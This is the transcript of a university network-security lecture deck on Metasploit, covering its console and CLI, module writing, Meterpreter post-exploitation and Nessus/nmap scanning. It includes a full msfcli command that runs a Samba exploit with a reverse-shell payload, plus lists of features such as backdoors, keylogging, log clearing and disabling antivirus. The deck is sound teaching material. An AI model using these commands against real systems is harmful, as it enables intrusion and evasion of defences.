1 / 27

EECS 354 Network Security

EECS 354 Network Security. Metasploit Features. Introduction. Metasploit is an automated exploitation framework Open source, continuous development and updates Tools for scanning, exploit development, exploitation, and post-exploitation Extensible through plugins and modules.

damisi
Download Presentation

EECS 354 Network Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. EECS 354Network Security • Metasploit Features

  2. Introduction • Metasploit is an automated exploitation framework • Open source, continuous development and updates • Tools for scanning, exploit development, exploitation, and post-exploitation • Extensible through plugins and modules

  3. Metasploit Architecture

  4. Metasploit Basic Usage • Writing a Metasploit Module • Metasploit Special Features • Scanning Basics

  5. Msfconsole • Most feature-full interface for Metasploit is msfconsole • Like a shell, just for Metasploit • In addition to special Metasploit commands, also accepts bash commands • ping, ls, curl, etc

  6. Common Commands • connect • like netcat or telnet, connects to host on specified port • search • search module database, by name, platform, app, cve, and more • sessions • List or manipulate your open sessions (shells, VNC, etc) • show • Show anything: show modules, exploits, payloads, options (for selected module)

  7. Basic Usage • Using a module: • (Optional) If your module is not loaded, load it with loadpath • (Optional) If you don’t know the name, search for it with search • Select your module with use • Fill parameters using set (show parameters with show options) • Run with exploit • Reload and run with rexploit

  8. Metasploit CLI • Sometimes you’d rather not load up the whole console just to run a single script • Use msfcli to interact with Metasploit from the command-line

  9. Metasploit CLI root@kali:~# msfcli -h Usage: /opt/metasploit/msf3/msfcli [mode] ==================================================================== Mode Description ---- ----------- (A)dvanced Show available advanced options for this module (AC)tions Show available actions for this auxiliary module (C)heck Run the check routine of the selected module (E)xecute Execute the selected module (H)elp You're looking at it baby! (I)DS Evasion Show available ids evasion options for this module (O)ptions Show available options for this module (P)ayloads Show available payloads for this module (S)ummary Show information about this module (T)argets Show available targets for this exploit module

  10. Metasploit CLI • Example usage: • msfcli exploit/multi/samba/usermap_script \ RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse \ LHOST=172.16.194.163 E • <Exploit Module>: path to ruby script • RHOST: remote host • PAYLOAD: shellcode for reverse shell • LHOST: local host • E: execute

  11. Metasploit Basic Usage • Writing a Metasploit Module • Metasploit Special Features • Scanning Basics

  12. Writing Modules • Auxiliary • Defines a function called run • Can do simple tasks: fuzzing, scanning, sniffing, bruteforcing logins • Exploit • Defines a function called exploit • Requires a payload (shellcode) • Most basic form • Connect to remote host • Send payload • Run handler (sets up reverse shell connection) • Disconnect

  13. Writing Modules require 'msf/core‘ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) # set target and payload characteristics, etc end def exploit connect sock.put(payload.encoded) handler disconnect end

  14. Sidenote for Project 4 • Project 4 requires writing brute force exploits • Metasploit provides the brute mix-in • include Exploit::Brute • Module overrides the exploit method to call brute_exploit for each step within an address range • Start, stop, step, and (optional) delay are defined in target.bruteforce • Step of 0 will be automatically resolved to the size of the payload’s nop sled

  15. Metasploit Basic Usage • Writing a Metasploit Module • Metasploit Special Features • Scanning Basics

  16. Post-Exploitation Tools • Most post-exploitation tools rely on a meterpreter shell • Meterpreter is a payload that can be selected with many exploits • A meterpreter shell provides a consistent cross-platform post-exploitation interface • Also acts as an in-memory stager for loading additional exploit code remotely

  17. Meterpreter Basics • Provides basic UNIX interface: ls, cat, cd, pwd, getuid, ps • Also some convenience features • seach: convenient file system searching • migrate: migrate control to another running process • clearev: clears logs (Windows only) • upload, download • webcam_list, webcam_snap

  18. More Meterpreter Features • Persistent backdoors with metsvc • John the Ripper integration • Remote packet sniffing • Keylogging • Kill off antivirus • Dump system information • Pretty much anything you can think of • Or you can write your own scripts, too

  19. Metasploit Databases • Very powerful db_* commands • Databases are often used to store hosts, ports, services, credentials, etc • Can be populated directly from scan results • db_autopwn –p –e • Somewhat controversial command • Will attempt to execute all known exploits on all known hosts on the known open and specified ports • Very “noisy”

  20. Scanner Integration • Integration with nmap and Nessus • Can select to send scan results directly to database for exploitation • Hosts, ports, services, machine info • Simple interface using msfconsole • nmap or db_nmap • load nessus • Or, ‘search portscan’ for auxiliary modules

  21. Metasploit Basic Usage • Writing a Metasploit Module • Metasploit Special Features • Scanning Basics

  22. Nessus • State-of-the-art scanning tool • Web interface for designing scans • Can set ‘policies’ to get quicker scans • Or, just scan everything and find all services • Associates results with CVE, other references for easy translation to exploitation

  23. Nessus

  24. Nessus • Results are listed by priority • Low -> Critical • Critical vulnerabilities usually can lead to root shell on a remote machine • Medium-High may mean lower privilege or limited commands • Ex: default credentials for account user:user

  25. TCP Scanning • TCP SYN scan • Most common • Never opens a full connection, only sends a single packet • Returns port state • Open: received SYNACK • Filtered: no response (firewalled) • Closed: received RST • Other TCP scans: • FIN, Null, Xmas • connect • ACK

  26. UDP Scanning • UDP scans send an arbitrary (or empty) UDP packet, or a crafted packet for specific ports (like DNS) • Open/filtered will timeout • Closed will send ICMP unreachable • These responses are often rate limited, making UDP scans very slow in general

  27. OS Detection and more • Scanners can use OS fingerprinting to detect an OS based on response characteristics • Scanners also attempt service identification • Services normally run on specified ports • Services can be ‘interrogated’ • Sending crafted packets and anticipating particular responses for particular services

More Related